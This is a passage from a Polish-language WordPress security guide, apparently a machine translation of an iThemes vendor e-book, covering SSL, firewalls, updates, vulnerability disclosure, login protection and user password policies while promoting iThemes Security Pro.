Innym sposobem, w jaki nie włącz SSL będzie Cię kosztować, jest to, że przeglądarka użytkownika ostrzeże go, że Twoja witryna nie jest bezpieczna. Jak wspomnieliśmy wcześniej, po zainstalowaniu certyfikatu SSL w witrynie, adres URL witryny zmieni się z http ://twojastrona.com na https: //twojastrona/pl. Na przykład Chrome oznaczy strony zaszyfrowane HTTPS jako bezpieczne za pomocą zamkniętej kłódki. Alternatywnie Chrome zastąpi zablokowaną kłódkę na wszystkich niezaszyfrowanych stronach HTTP tekstem Not Secure .

Nie będę robił zakupów w witrynach oznaczonych przez moją przeglądarkę jako niezabezpieczone i nie tylko ja tego nie robię. Według badania przeprowadzonego przez GlobalSign 85% kupujących online unika niezabezpieczonych stron internetowych. Pamiętaj, że w 2021 r. ważne jest, aby wszystkie witryny korzystały z protokołu HTTPS, a nie tylko strony logowania i płatności. Potencjalny klient może nie przejść do bezpiecznej kasy, jeśli strony sklepu są oznaczone przez jego przeglądarkę internetową jako niezabezpieczone.

3. Możesz stracić potencjalnych klientów

Ochrona klientów jest podstawowym powodem włączenia SSL w Twojej witrynie. Jeśli są gotowi powierzyć Ci swoją działalność, przynajmniej możesz nagrodzić to zaufanie, chroniąc je mocą szyfrowania.

Jeśli haker może ukraść dane karty kredytowej klienta z powodu braku szyfrowania w Twojej witrynie, nie tylko stracisz ich zaufanie, ale także stracisz część ich przyszłej działalności.

Jak mogę sprawdzić, czy moja witryna ma włączoną obsługę SSL?

Prostym sposobem sprawdzenia, czy Twoja witryna ma zainstalowany certyfikat SSL, jest sprawdzenie w pasku adresu przeglądarki, czy adres URL zaczyna się od HTTP czy HTTPS. Jeśli adres URL zaczyna się od HTTPS, Twoja witryna jest zabezpieczona SSL.

Możesz także użyć narzędzia do sprawdzania SSL, takiego jak SSL Labs. Kontroler SSL przeskanuje Twoją witrynę w poszukiwaniu certyfikatu SSL i poinformuje Cię, kiedy Twój certyfikat SSL wygaśnie.

Jak mogę zainstalować certyfikat SSL na mojej stronie WordPress?

Jeśli Twoja witryna WordPress nie ma SSL, pierwszą rzeczą, którą powinieneś zrobić, to poprosić dostawcę usług hostingowych o sprawdzenie, czy udostępnia bezpłatny certyfikat SSL i konfigurację. W 2021 r. większość firm hostingowych zawiera SSL w swoich pakietach hostingowych. Na przykład iThemes Hosting zapewnia i zarządza SSL dla każdej witryny.

Jeśli Twój host nie zapewnia Ci bezpłatnego certyfikatu SSL, nie martw się, wciąż istnieje wiele innych opcji.

Cloudflare oferuje bezpłatny udostępniony certyfikat SSL dla witryn WordPress. Jeśli nie chcesz mieć współdzielonego certyfikatu SSL i nie masz nic przeciwko korzystaniu z wiersza poleceń, CertBot to doskonała opcja. Certbot nie tylko utworzy dla Ciebie bezpłatny certyfikat SSL za pomocą Let's Encrypt, ale również automatycznie zarządza odnowieniem certyfikatu za Ciebie.

Włączenie SSL w witrynie WordPress jest koniecznością w 2021 roku. SSL zabezpiecza komunikację między Tobą a Twoimi klientami, poprawia SEO i zapewnia odwiedzającym Twoją witrynę komfort, że są bezpieczni podczas przeglądania Twojej witryny.

Użyj zapory aplikacji internetowej

Korzystanie z zapory aplikacji internetowej to świetny sposób na dodanie kolejnej warstwy ochrony do witryny WordPress.

Co to jest zapora aplikacji internetowej?

Zapora WAF lub Web Application Firewall pomaga zabezpieczyć Twoją witrynę, monitorując ruch internetowy kierowany do Twojej witryny, zanim trafi on na Twoją witrynę.

Dodając plik WAF przed WordPressem, dodajesz punkt kontroli bezpieczeństwa między Internetem a Twoją witryną. Zanim ruch będzie mógł uzyskać dostęp do Twojej witryny, musi przejść przez WAF.

Jeśli WAF wykryje jakikolwiek złośliwy ruch, taki jak CSRF, XSS, SQL Injections i inne, odfiltruje go, zanim dotrze do Twojej witryny. Nie tylko to, ale WAF może pomóc wykryć atak DDoS i wdrożyć ograniczanie szybkości, aby zapobiec awariom witryny.

Trzy sposoby na wdrożenie WAF

Istnieją 3 różne sposoby wdrożenia WAF. Przyjrzyjmy się zaletom i wadom każdego typu.

1. WAF oparty na sieci — sieciowy lub fizyczny plik WAF jest oparty na sprzęcie. Główną zaletą sieciowego WAF jest niska latencja, która wynika z lokalnej instalacji. Jednak wadą jest cena przechowywania i utrzymania fizycznego sprzętu. Cena i wymagania dotyczące fizycznej pamięci masowej sprawiają, że jest to kiepski wybór dla większości ludzi.
2. WAF oparty na hoście — WAF oparty na hoście lub lokalny plik WAF jest zintegrowany z WordPress, zwykle przy użyciu wtyczki. Zaletą WAF opartego na hoście jest to, że jest tańszy niż WAF oparty na sieci. Wadą lokalnego WAF są wymagania dotyczące zasobów serwera. A ponieważ filtrowanie ruchu odbywa się w Twojej witrynie, może to skutkować wolniejszym ładowaniem strony dla odwiedzających Twoją witrynę.
3. WAF oparty na chmurze — WAF oparty na chmurze jest zazwyczaj najlepszą opcją dla większości ludzi. Zaletą opartych na chmurze plików WAF jest to, że są one przystępne cenowo i nie wymagają zarządzania nimi. Dodatkowo, ponieważ ruch jest filtrowany przed dotarciem do Twojej witryny, nie będzie to pochłaniało zasobów serwera i nie spowalniało Twojej witryny. Cloudflare i Sucuri są popularnymi dostawcami zapór sieciowych w chmurze.

Zawijanie

W tej sekcji dowiedzieliśmy się, dlaczego tak ważny jest wybór odpowiedniego hosta, jak zabezpieczyć komunikację między naszą witryną a jej odwiedzającymi oraz w jaki sposób WAF może pomóc w blokowaniu szkodliwego ruchu w naszej witrynie.

W nadchodzącej sekcji poznasz najlepsze praktyki, aby zapewnić bezpieczeństwo oprogramowania WordPress.

Sekcja 5: Bezpieczeństwo oprogramowania WordPress

Za każdym razem, gdy instalujesz nową wtyczkę lub motyw, wprowadzasz nowy kod, który może zostać wykorzystany przez hakerów. W tej sekcji dowiesz się nakazów i zakazów zarządzania WordPressem, wtyczkami i motywami.

1. Instaluj oprogramowanie tylko z zaufanych źródeł

Instaluj wtyczki i motywy WordPress tylko z zaufanych źródeł. Powinieneś instalować tylko oprogramowanie, które otrzymujesz z WordPress.org, dobrze znanych repozytoriów komercyjnych lub bezpośrednio od renomowanych programistów. Będziesz chciał uniknąć „pustej” wersji komercyjnych wtyczek, ponieważ mogą one zawierać złośliwy kod. Nie ma znaczenia, w jaki sposób zablokujesz swoją witrynę WordPress, jeśli to ty instalujesz złośliwe oprogramowanie.

Jeśli wtyczka lub motyw WordPress nie są rozpowszechniane na stronie dewelopera, przed pobraniem wtyczki należy przeprowadzić należytą staranność. Skontaktuj się z programistami, aby sprawdzić, czy są oni w jakikolwiek sposób powiązani z witryną, która oferuje ich produkt za darmo lub po obniżonej cenie.

2. Usuń nieużywaną wtyczkę i motywy

Posiadanie nieużywanych lub nieaktywnych wtyczek i motywów w Twojej witrynie jest poważnym błędem bezpieczeństwa WordPress. Każdy fragment kodu w Twojej witrynie to potencjalny punkt wejścia dla hakera.

Powszechną praktyką dla programistów jest używanie kodu innych firm, takich jak biblioteki JS, w swoich wtyczkach i motywach. Niestety, jeśli biblioteki nie są odpowiednio utrzymywane, mogą tworzyć luki, które atakujący mogą wykorzystać do zhakowania Twojej witryny.

Uwaga: Użyj iThemes Sync Pro Site Audit, aby sprawdzić swoje strony internetowe pod kątem zewnętrznych bibliotek JavaScript ze znanymi lukami w zabezpieczeniach.

Odinstaluj i całkowicie usuń wszelkie niepotrzebne wtyczki i motywy ze swojej witryny WordPress, aby ograniczyć liczbę punktów dostępu i kodu wykonywalnego w swojej witrynie.

3. Aktualizuj swoje oprogramowanie WordPress

Aktualizowanie oprogramowania jest istotną częścią każdej strategii bezpieczeństwa WordPress. Aktualizacje to nie tylko poprawki błędów i nowe funkcje. Aktualizacje mogą również zawierać krytyczne poprawki bezpieczeństwa. Bez tej poprawki narażasz swój telefon, komputer, serwer, router lub stronę internetową na atak.

Posiadanie podatnej wtyczki lub motywu, dla których dostępna jest poprawka, ale nie została zastosowana, jest głównym winowajcą zhakowanych witryn WordPress. Oznacza to, że większość luk jest wykorzystywana PO opublikowaniu łaty na lukę.

Wielokrotnie zgłaszane naruszenie Equifax można było zapobiec, gdyby zaktualizowali swoje oprogramowanie. W przypadku naruszenia Equifax po prostu nie było usprawiedliwienia.

Coś tak prostego jak aktualizacja oprogramowania może Cię chronić. Nie ignoruj ​​więc aktualizacji WordPress — aktualizacje są jednym z najbardziej podstawowych składników zabezpieczeń WordPressa i wszystkich zabezpieczeń internetowych.

Patch wtorek

Patch Tuesday to nieoficjalny termin odnoszący się do regularnych poprawek błędów i zabezpieczeń, które Microsoft publikuje w drugi wtorek każdego miesiąca. To fantastyczne, że Microsoft wydaje poprawki bezpieczeństwa w tak niezawodnym rytmie. Wtorek z łatami to także dzień, w którym publicznie ujawniono luki w zabezpieczeniach, które łata Microsoft.

Sprawdź sekcję Co zaktualizować i jak zautomatyzować aktualizacje w e-booku The Ultimate Guide to WordPress Security in 2020, aby dowiedzieć się, jak automatycznie stosować aktualizacje wtorkowe poprawki.

Wykorzystaj środę

W środę po wtorkowej łatce często zdarza się, że wielu atakujących wykorzystuje znaną wcześniej lukę w przestarzałych i niezałatanych systemach. Tak więc środa po wtorku z łatami została nieoficjalnie nazwana środą na wykorzystanie.

Dlaczego hakerzy atakują załatane luki w zabezpieczeniach?

Hakerzy atakują załatane luki w zabezpieczeniach, ponieważ wiedzą, że ludzie nie aktualizują (w tym wtyczek i motywów w Twojej witrynie). Standardem branżowym jest publiczne ujawnianie luk w zabezpieczeniach w dniu, w którym zostaną one załatane. Po publicznym ujawnieniu luki staje się ona „znaną luką” dla przestarzałych i niezałatanych wersji oprogramowania. Oprogramowanie ze znanymi lukami w zabezpieczeniach jest łatwym celem dla hakerów.

Hakerzy lubią łatwe cele, a posiadanie oprogramowania ze znanymi podatnościami jest jak przekazanie hakerowi instrukcji krok po kroku, jak włamać się do witryny WordPress, serwera, komputera lub innego urządzenia podłączonego do Internetu.

Odpowiedzialne ujawnianie

Być może zastanawiasz się, dlaczego luka w zabezpieczeniach zostałaby ujawniona, skoro daje hakerom możliwość ataku. Cóż, bardzo często badacz bezpieczeństwa znajduje i prywatnie zgłasza tę lukę twórcy oprogramowania.

W przypadku odpowiedzialnego ujawnienia, wstępny raport badacza jest przekazywany prywatnie twórcom firmy będącej właścicielem oprogramowania, ale za zgodą, że pełne szczegóły zostaną opublikowane po udostępnieniu poprawki. W przypadku znaczących luk w zabezpieczeniach może wystąpić niewielkie opóźnienie w ujawnieniu luki, aby dać większej liczbie osób czas na poprawkę.

Badacz bezpieczeństwa może wyznaczyć producentowi oprogramowania termin odpowiedzi na zgłoszenie lub dostarczenia poprawki. Jeśli ten termin nie zostanie dotrzymany, badacz może publicznie ujawnić lukę, aby wywrzeć presję na dewelopera, aby wydał łatkę.

Publiczne ujawnienie luki w zabezpieczeniach i pozorne wprowadzenie Zero Day – rodzaju luki, która nie ma łaty i jest wykorzystywana na wolności – może wydawać się kontrproduktywne. Jest to jednak jedyna dźwignia, którą badacz musi wywrzeć na deweloperze, aby załatał tę lukę.

Jeśli haker odkryje lukę, może po cichu użyć exploita i wyrządzić szkody użytkownikowi końcowemu (to ty), podczas gdy programista pozostaje zadowolony z pozostawienia luki bez łaty.

Google Project Zero ma podobne wytyczne, jeśli chodzi o ujawnianie luk w zabezpieczeniach. Publikują pełne szczegóły dotyczące luki po 90 dniach, niezależnie od tego, czy luka została załatana, czy nie.

Nauka aktualizacji: Trudna droga

Pod koniec 2018 r. hakerzy aktywnie wykorzystywali exploita we wtyczce WP GDPR Compliance. Exploit umożliwiał nieautoryzowanym użytkownikom — osobom niezalogowanym do witryny — modyfikowanie ustawień rejestracji użytkownika WP i zmianę domyślnej roli nowego użytkownika z subskrybenta na administratora. Na szczęście twórcy wtyczek WP GDPR Compliance działali szybko i opublikowali łatkę na lukę dzień po jej publicznym ujawnieniu.

Ale, podobnie jak w przypadku Exploit Wednesday, hakerzy zaatakowali lukę, mimo że została wydana łatka. W ciągu kilku dni i tygodni po ujawnieniu luki w zabezpieczeniach WP GDPR Compliance otrzymaliśmy falę zgłoszeń, że witryny WordPress zostały zhakowane przez osoby atakujące wykorzystujące tę lukę.

Posiadanie podatnej wtyczki lub motywu, dla których dostępna jest poprawka, ale nie została zastosowana, jest głównym winowajcą zhakowanych witryn WordPress. TO JEST TAK FRUTUJĄCE!!!!! Oznacza to, że większości włamań WP można było zapobiec.

To denerwujące, gdy myślisz o wszystkich ludziach, którzy wydali mnóstwo pieniędzy na czyszczenie swojej witryny, o przychodach, które utracili, gdy ich witryny nie działały, oraz o przyszłych przychodach, które utracili z powodu utraty zaufania klientów. To sprawia, że ​​​​jest to jeszcze bardziej denerwujące, gdy wiesz, że całej tej udręce można było zapobiec dzięki prostej aktualizacji.

Funkcja zarządzania wersją iThemes Security Pro umożliwia dostosowanie i zautomatyzowanie aktualizacji WordPress.

4. Śledź luki w WordPressie

Aktualizowanie wtyczek i motywów nie ochroni Cię przed każdą luką w WordPressie. Niektóre wtyczki i motywy WordPress zostały porzucone przez twórców, którzy je stworzyli.

Niestety, jeśli porzucona wtyczka lub motyw ma lukę, nigdy nie dostanie łatki. Hakerzy będą atakować strony internetowe, które używają tych teraz trwale podatnych na ataki wtyczek.

Jeśli masz porzuconą wtyczkę ze znaną luką w swojej witrynie, dajesz hakerom plany, których potrzebują, aby przejąć Twoją witrynę. Dlatego musisz śledzić wszystkie najnowsze luki w zabezpieczeniach.

Trudno jest śledzić każdą ujawnioną lukę w zabezpieczeniach WordPressa i porównywać tę listę z wersjami wtyczek i motywów, które zainstalowałeś na swojej stronie. Śledzenie luk w zabezpieczeniach to różnica między posiadaniem bezpiecznej strony internetowej a taką, którą hakerzy z łatwością wykorzystają.

Dobra wiadomość dla Ciebie! Śledzimy i udostępniamy każdą ujawnioną lukę w naszych raportach dotyczących luk w zabezpieczeniach WordPress.

5. Przeskanuj swoją witrynę w poszukiwaniu luk

Szybszym sposobem ochrony witryny przed łatwymi atakami hakerów jest użycie automatycznych skanów w celu sprawdzenia witryn pod kątem znanych luk w zabezpieczeniach.

Skaner witryn iThemes Security Pro to Twój sposób na zautomatyzowanie ochrony przed lukami we wszystkich witrynach WordPress. Skaner witryn sprawdza witrynę pod kątem znanych luk w zabezpieczeniach i automatycznie instaluje łatkę, jeśli jest dostępna.

Witryna iThemes Security Pro sprawdza 3 rodzaje luk w zabezpieczeniach.

1. Luki w WordPressie
2. Luki w zabezpieczeniach wtyczek
3. Luki motywu

Funkcja audytu witryny iThemes Sync Pro wykorzystuje moc Google Lighthouse do ochrony Twojej witryny. Audyt witryny sprawdza i flaguje strony zawierające frontowe biblioteki JavaScript ze znanymi lukami w zabezpieczeniach.

Powszechną praktyką dla programistów jest używanie kodu innych firm, takich jak biblioteki JS, w swoich wtyczkach i motywach. Niestety, jeśli biblioteki nie są odpowiednio utrzymywane, mogą tworzyć luki, które atakujący mogą wykorzystać do zhakowania Twojej witryny. Używanie komponentów ze znanymi podatnościami znajduje się na liście OWASP Top 10.

Audyt Strony uratował mój boczek! Utworzyłem harmonogram audytu, aby Sync Pro przeprowadzał cotygodniowe automatyczne audyty i wysyłał mi raporty z audytu pocztą elektroniczną. Utrzymuję wszystko na bieżąco i dlatego byłem zszokowany, gdy w jednym z audytów mojej witryny zobaczyłem, że używam bibliotek JavaScript ze znanymi lukami w zabezpieczeniach.

Raport wskazał mi na przestarzałą wersję jQuery w katalogu WordPress witryny, zaśmieconą znanymi lukami! Na szczęście w moim audycie Sync Pro Site Audit zauważyłem, że używam bibliotek JavaScript ze znanymi lukami w zabezpieczeniach i udało mi się rozwiązać problem, zanim moja witryna została zhakowana.

Zawijanie

Właściwe zarządzanie oprogramowaniem, które sprawia, że ​​Twoja witryna działa, w tym wtyczkami WordPress, motywami i rdzeniem WordPress, będzie mieć duży wpływ na strategię bezpieczeństwa WordPress, zabezpieczając witrynę przed atakującymi online.

Sekcja 6: Zabezpieczanie logowania do WordPressa

Adres URL logowania do WordPressa jest taki sam dla każdej witryny WordPress i nie wymaga żadnych specjalnych uprawnień dostępu. Każdy, kto ma jakiekolwiek doświadczenie w pracy z WordPress, wie, że adres URL logowania znajduje się na stronie /wp-login.php .

Dostępność strony logowania WordPress sprawia, że ​​jest ona najbardziej atakowaną – i potencjalnie najbardziej wrażliwą – częścią dowolnej witryny WordPress. Na szczęście dla nas wtyczka iThemes Security Pro ułatwia zabezpieczenie logowania do WordPressa.

Rzućmy okiem na narzędzia w iThemes Security Pro, których możesz użyć do zabezpieczenia swojego loginu WordPress i uczynienia go prawie nieprzeniknionym!

1. Ogranicz próby logowania

Pierwszym krokiem do zabezpieczenia logowania do WordPressa jest ograniczenie nieudanych prób logowania. Domyślnie w WordPress nie ma nic wbudowanego, aby ograniczyć liczbę nieudanych prób logowania, które ktoś może wykonać. Bez ograniczenia liczby nieudanych prób logowania, jakie może wykonać osoba atakująca, mogą próbować kombinacji różnych nazw użytkowników i haseł, dopóki nie znajdą takiego, które działa.

Funkcja iThemes Security Pro Local Brute Force Protection śledzi nieprawidłowe próby logowania wykonane przez hosta lub adres IP i nazwę użytkownika. Gdy adres IP lub nazwa użytkownika wykona zbyt wiele kolejnych nieprawidłowych prób logowania, zostaną one zablokowane i nie będą mogły podejmować kolejnych prób przez określony czas.

Aby rozpocząć korzystanie z funkcji Local Brute Force Protection , włącz ją na stronie głównej strony ustawień iThemes Security Pro.

Ustawienia Local Brute Force Protection umożliwiają ustawienie progów blokad.

• Maksymalna liczba prób logowania na hosta — liczba nieprawidłowych prób logowania na adres IP, zanim zostanie zablokowany.
• Maksymalna liczba prób logowania na użytkownika — jest to liczba nieprawidłowych prób logowania, na które dozwolona jest nazwa użytkownika, zanim zostanie zablokowana.
• Minuty do zapamiętania złego logowania — to czas, przez jaki nieprawidłowa próba logowania powinna być wliczana do adresu IP lub nazwy użytkownika w przypadku blokady.
• Automatycznie zablokuj użytkownika „admin” — po włączeniu każda osoba używająca nazwy użytkownika administratora podczas logowania zostanie automatycznie zablokowana.

Jest kilka rzeczy, o których warto pamiętać podczas konfigurowania ustawień blokady. Chcesz przekazać użytkownikom nieprawidłowe próby logowania niż podajesz adresy IP. Załóżmy, że Twoja witryna jest poddawana atakowi typu brute force, a atakujący używa Twojej nazwy użytkownika. Celem jest zablokowanie adresu IP atakującego, a nie nazwy użytkownika, dzięki czemu nadal będziesz mógł się zalogować i wykonać pracę, nawet gdy Twoja witryna jest atakowana.

Nie chcesz też, aby te ustawienia były zbyt rygorystyczne, ustawiając zbyt małą liczbę nieprawidłowych prób logowania i zbyt długi czas pamiętania nieprawidłowych prób. Jeśli zmniejszysz liczbę nieprawidłowych prób logowania dla hostów/adresów IP do 1 i ustawisz minuty na zapamiętanie złej próby logowania na miesiąc, drastycznie zwiększysz prawdopodobieństwo nieumyślnego zablokowania legalnych użytkowników.

2. Ogranicz zewnętrzne próby uwierzytelnienia na żądanie

Istnieją inne sposoby logowania się do WordPressa poza użyciem formularza logowania. Korzystając z XML-RPC, osoba atakująca może wykonać setki prób podania nazwy użytkownika i hasła w jednym żądaniu HTTP. Metoda amplifikacji brute force umożliwia atakującym tysiące prób nazwy użytkownika i hasła przy użyciu XML-RPC w zaledwie kilku żądaniach HTTP.

Korzystając z ustawień WordPress Tweaks iThemes Security Pro, możesz zablokować wiele prób uwierzytelnienia na żądanie XML-RPC. Ograniczenie liczby prób podania nazwy użytkownika i hasła do jednego na każde żądanie znacznie pomoże w zabezpieczeniu logowania do WordPressa.

3. Ochrona sieciowa Brute Force

Ograniczenie prób logowania polega na lokalnej ochronie przed brutalną siłą. Lokalna ochrona przed atakami brute force uwzględnia tylko próby uzyskania dostępu do Twojej witryny i blokuje użytkowników zgodnie z regułami blokady określonymi w ustawieniach zabezpieczeń.

Ochrona Network Brute Force idzie o krok dalej. Sieć jest społecznością iThemes Security i ma ponad milion witryn internetowych. Jeśli adres IP zostanie zidentyfikowany jako próbujący włamać się na strony internetowe w społeczności iThemes Security, adres IP zostanie dodany do listy zablokowanych Network Bruce Force.

Gdy adres IP znajdzie się na liście zablokowanych sieci Network Brute Force, zostanie zablokowany na wszystkich stronach internetowych w sieci. Tak więc, jeśli adres IP zaatakuje moją witrynę i zostanie zbanowany, zostanie zgłoszony do iThemes Security Brute Force Network. Mój raport może pomóc w zbanowaniu IP w całej sieci. Uwielbiam to, że mogę pomóc zabezpieczyć logowanie innych osób do WordPressa, po prostu włączając ochronę sieci bezpieczeństwa iThemes.

Aby rozpocząć korzystanie z funkcji Network Force Protection , włącz ją na głównej stronie ustawień zabezpieczeń.

Następnie wprowadź swój adres e-mail, wybierz, czy chcesz otrzymywać aktualizacje pocztą e-mail, a następnie kliknij przycisk Zapisz .

4. Ogranicz dostęp urządzenia do pulpitu nawigacyjnego WP

Ostatnim krokiem do zabezpieczenia loginu WordPress jest ograniczenie dostępu do pulpitu WordPress do zestawu urządzeń. Funkcja iThemes Security Pro Trusted Devices identyfikuje urządzenia, których Ty i inni użytkownicy używacie do logowania się do witryny WordPress. Gdy użytkownik zalogował się na nierozpoznanym urządzeniu, Zaufane urządzenia mogą ograniczyć jego możliwości na poziomie administratora. Oznacza to, że haker był w stanie ominąć inne metody zabezpieczania logowania – mało prawdopodobne – nie miałby możliwości wprowadzenia złośliwych zmian w Twojej witrynie.

Aby rozpocząć korzystanie z Zaufanych urządzeń , włącz je na stronie głównej ustawień zabezpieczeń, a następnie kliknij przycisk Konfiguruj ustawienia .

W ustawieniach Zaufane urządzenia zdecyduj, których użytkowników chcesz używać tej funkcji, a następnie włącz funkcje Ogranicz możliwości i Ochrona przed przejęciem sesji .

Po włączeniu nowego ustawienia Zaufane urządzenia użytkownicy otrzymają powiadomienie na pasku administracyjnym WordPressa o oczekujących nierozpoznanych urządzeniach. Jeśli Twoje bieżące urządzenie nie zostało dodane do listy zaufanych urządzeń, kliknij łącze Potwierdź to urządzenie, aby wysłać e-mail autoryzacyjny .

Kliknij przycisk Potwierdź urządzenie w wiadomości e-mail Nierozpoznany login, aby dodać bieżące urządzenia do listy Zaufane urządzenia.

Zawijanie

Dostępność strony logowania WordPress sprawia, że ​​jest to najbardziej atakowana i potencjalnie podatna część dowolnej witryny WordPress. Jednak wykonanie kroków opisanych w tej sekcji sprawi, że logowanie do WordPressa będzie prawie niemożliwe do przeniknięcia.

Sekcja 7: Zabezpieczanie użytkowników WordPress

Ilekroć mówimy o bezpieczeństwie użytkownika, często słyszymy pytania typu, czy każdy użytkownik WordPressa powinien mieć takie same wymagania bezpieczeństwa i ile bezpieczeństwa jest zbyt dużym bezpieczeństwem?

Nie martw się. Odpowiadamy na wszystkie te pytania. Ale najpierw porozmawiajmy o różnych typach użytkowników WordPressa.

Jakie są rodzaje użytkowników WordPressa?

Istnieje 5 różnych domyślnych użytkowników WordPress.

1. Administrator
2. Redaktor
3. Autor
4. Współpracownik
5. Abonent

Każdy użytkownik ma inne możliwości. Możliwości określają, co mogą zrobić po uzyskaniu dostępu do pulpitu nawigacyjnego. Przeczytaj więcej o rolach i uprawnieniach użytkowników WordPress.

Potencjalne szkody różnych zhakowanych użytkowników WordPress

Zanim zrozumiemy, jak zabezpieczyć naszych użytkowników WordPressa, musimy najpierw zrozumieć poziom zagrożenia każdego typu zaatakowanego użytkownika. Rodzaj i poziom szkód, jakie może zadać atakujący, różni się znacznie w zależności od ról i możliwości zhakowanego użytkownika.

Administrator — wysoki poziom zagrożenia

Administratorzy mają możliwości, co tylko chcą.

• Twórz, usuwaj i modyfikuj użytkowników.
• Instaluj, usuwaj i edytuj wtyczki i motywy.
• Twórz, usuwaj i edytuj wszystkie posty i strony.
• Publikuj i cofaj publikację postów i stron.
• Dodaj i usuń multimedia.

Jeśli haker dostanie się w ręce jednego z administratorów Twojej witryny, może zatrzymać Twoją witrynę dla okupu. Jak wspomnieliśmy wcześniej, Ransomware odnosi się do sytuacji, gdy haker przejmie Twoją witrynę i nie zwróci Ci jej, chyba że zapłacisz im wysoką opłatę.

Redaktor – Wysoki poziom zagrożenia

Redaktor zarządza całą zawartością serwisu. Ci użytkownicy wciąż mają sporo władzy.

• Twórz, usuwaj i edytuj wszystkie posty i strony.
• Publikuj i cofaj publikację wszystkich postów i stron.
• Prześlij pliki multimedialne.
• Zarządzaj wszystkimi linkami.
• Zarządzaj komentarzami.
• Zarządzaj kategoriami.

Jeśli atakujący przejmie kontrolę nad kontem redaktora, może zmodyfikować jedną z Twoich stron, aby wykorzystać ją w ataku phishingowym. Phishing to rodzaj ataku wykorzystywanego do kradzieży danych użytkownika, w tym danych logowania i numerów kart kredytowych.

Phishing to jeden z najpewniejszych sposobów na umieszczenie Twojej witryny na czarnej liście przez Google. Każdego dnia 10 000 witryn trafia na listę blokad Google z różnych powodów.

Autor – Średni poziom zagrożenia

Autor został zaprojektowany do tworzenia i zarządzania własną treścią.

• Twórz, usuwaj i edytuj własne posty i strony.
• Publikuj i publikuj własne posty.
• Prześlij pliki multimedialne

Gdyby atakujący przejął kontrolę nad kontem autora, mógłby utworzyć strony i posty, które przekierują odwiedzających Twoją witrynę na złośliwe witryny.

Współtwórca i subskrybent – niski poziom zagrożenia

Współtwórca to uproszczona wersja roli autora. Nie mają mocy wydawniczej.

• Twórz i edytuj własne posty.
• Usuń własne nieopublikowane posty.

Subskrybent może czytać rzeczy publikowane przez innych użytkowników.

Hakerzy z rolą współautora lub subskrybenta nie mogą wprowadzać żadnych złośliwych zmian, ale mogą ukraść poufne informacje przechowywane na koncie lub stronie profilu użytkownika.

6 wskazówek, jak zabezpieczyć swoich użytkowników WordPress

Ok, więc to jest trochę paskudnych rzeczy, które hakerzy mogą zrobić na naszych stronach internetowych. Dobrą wiadomością jest to, że większości ataków na konta użytkowników WordPress można zapobiec przy niewielkim wysiłku z Twojej strony.

Przyjrzyjmy się, co możesz zrobić, aby zabezpieczyć użytkowników WordPressa. Prawda jest taka, że ​​te metody bezpieczeństwa WordPress pomogą zabezpieczyć każdy typ użytkownika WordPress. Ale gdy przejdziemy przez każdą z metod, poinformujemy Cię, których użytkowników powinieneś wymagać, aby korzystać z tej metody.

1. Daj ludziom tylko te możliwości, których potrzebują

Najłatwiejszym sposobem ochrony witryny jest zapewnienie użytkownikom tylko potrzebnych im możliwości, a nie niczego więcej. Jeśli jedyną rzeczą, jaką ktoś zamierza zrobić w Twojej witrynie, jest tworzenie i edytowanie własnych postów na blogu, nie potrzebuje możliwości edytowania postów innych osób.

2. Zabezpiecz użytkowników WordPressa silnymi hasłami

Na liście skompilowanej przez Splash Data najpopularniejszym hasłem zawartym we wszystkich zrzutach danych było 123456. Zrzut danych to zhakowana baza danych wypełniona hasłami użytkowników zrzuconymi gdzieś w Internecie. Czy możesz sobie wyobrazić, ile osób w Twojej witrynie używa słabego hasła, jeśli 123456 jest najczęstszym hasłem w zrzutach danych?

Używanie słabego hasła jest jak próba zamknięcia drzwi wejściowych kawałkiem taśmy. Hakerom nigdy nie zabrało dużo czasu, aby przebić się przez słabe hasło na stronę internetową. Teraz, gdy hakerzy wykorzystują komputerowe karty graficzne w swoich atakach, czas potrzebny na złamanie hasła nigdy nie był krótszy.

Na przykład spójrzmy na wykres stworzony przez Terahash, firmę zajmującą się łamaniem haseł o wysokiej wydajności. Ich wykres pokazuje czas potrzebny do złamania hasła przy użyciu klastra hashstack składającego się z 448x RTX 2080s.

Domyślnie WordPress używa MD5 do haszowania haseł użytkowników przechowywanych w bazie danych WP. Tak więc, zgodnie z tym wykresem, Terahash mógł złamać 8-znakowe hasło… prawie natychmiast. To nie tylko imponujące, ale także naprawdę przerażające. Dobrą wiadomością jest to, że możemy zabezpieczyć nasz login WordPress, wymagając od naszych wysokopoziomowych użytkowników używania silnych haseł.

Funkcja iThemes Security Pro Passwords Requirement pozwala zmusić określonych użytkowników do używania silnego hasła. Włącz funkcję Wymagania dotyczące hasła na stronie głównej ustawień zabezpieczeń, a następnie wybierz użytkowników, od których chcesz wymagać używania silnego hasła.

3. Odrzucone złamane hasła

Według raportu Verizon Data Breach Investigations, ponad 70% pracowników ponownie używa haseł w pracy. Jednak najważniejszą statystyką raportu jest to, że 81% naruszeń związanych z hakerami wykorzystywało skradzione lub słabe hasła.

Hakerzy używają formy ataku brutalnej siły zwanej atakiem słownikowym. Atak słownikowy to metoda włamania się do witryny WordPress z powszechnie używanymi hasłami, które pojawiły się w zrzutach bazy danych. „Kolekcja nr 1? Data Breach hostowana na MEGA zawierała 1 160 253 228 unikalnych kombinacji adresów e-mail i haseł. To jest miliard z b. Taki wynik naprawdę pomoże atakowi słownikowemu zawęzić najczęściej używane hasła WordPress.

Jest to konieczne, aby uniemożliwić użytkownikom z możliwościami autorskimi i wyższymi używanie zhakowanych haseł w celu zabezpieczenia logowania do WordPressa. Możesz także zastanowić się, czy nie pozwolić użytkownikom niższego poziomu na używanie zhakowanych haseł.

Jest to całkowicie zrozumiałe i zachęca do jak najprostszego tworzenia nowego konta klienta. Jednak klient może nie wiedzieć, że hasło, którego używa, zostało znalezione w zrzucie danych. Wyświadczyłbyś swojemu klientowi wspaniałą przysługę, powiadamiając go o tym, że hasło, którego używa, zostało naruszone. Jeśli używają tego hasła wszędzie, możesz ich uratować przed poważnymi bólami głowy.

Funkcja iThemes Security Pro Refuse Compromised Passwords zmusza użytkowników do używania haseł, które nie pojawiły się w żadnych naruszeniach haseł śledzonych przez Have I Been Pwned. Włącz funkcję Wymagania dotyczące hasła na stronie głównej ustawień zabezpieczeń, a następnie wybierz użytkowników, którym chcesz zapobiec używaniu złamanego hasła.

4. Zabezpiecz użytkowników WordPressa za pomocą uwierzytelniania dwuetapowego

